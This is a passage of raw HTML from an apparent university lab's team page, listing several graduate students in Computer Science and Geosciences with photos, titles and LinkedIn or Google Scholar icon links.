style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c74\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c75\" class=\"h-text h-text-component style-851 style-local-182-c75 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c245\" class=\"h-text h-text-component style-901 style-local-182-c245 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"style-853 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c84-outer\">\n            <div data-colibri-id=\"182-c84\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c84 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c85\" class=\"d-block style-856 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c85-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c85-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"h-global-transition-all h-heading style-850 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c86\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c87\" class=\"h-text h-text-component style-851 style-local-182-c87 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c88\" class=\"h-text h-text-component style-852 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"style-857 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c342-outer\">\n            <div data-colibri-id=\"182-c342\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c342 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c343\" class=\"d-block style-854 style-local-182-c343 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c343-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c343-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c344\" class=\"h-global-transition-all h-heading style-850 style-local-182-c344 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c344\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c345\" class=\"h-text h-text-component style-851 style-local-182-c345 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c346\" class=\"h-text h-text-component style-902 style-local-182-c346 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c347\" class=\"style-855 style-local-182-c347 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c348-outer\">\n            <div data-colibri-id=\"182-c348\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c348 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c349\" class=\"d-block style-854 style-local-182-c349 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c349-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c349-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c350\" class=\"h-global-transition-all h-heading style-850 style-local-182-c350 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c350\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c351\" class=\"h-text h-text-component style-851 style-local-182-c351 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c352\" class=\"h-text h-text-component style-902 style-local-182-c352 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c353\" class=\"style-855 style-local-182-c353 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c354-outer\">\n            <div data-colibri-id=\"182-c354\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c354 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c355\" class=\"d-block style-854 style-local-182-c355 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c355-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c355-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c356\" class=\"h-global-transition-all h-heading style-850 style-local-182-c356 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c356\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c357\" class=\"h-text h-text-component style-851 style-local-182-c357 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c358\" class=\"h-text h-text-component style-902 style-local-182-c358 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c359\" class=\"style-855 style-local-182-c359 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c361-outer\">\n            <div data-colibri-id=\"182-c361\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c361 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c362\" class=\"d-block style-854 style-local-182-c362 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c362-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c362-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c363\" class=\"h-global-transition-all h-heading style-850 style-local-182-c363 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c363\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c364\" class=\"h-text h-text-component style-851 style-local-182-c364 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c365\" class=\"h-text h-text-component style-902 style-local-182-c365 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c366\" class=\"style-855 style-local-182-c366 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon 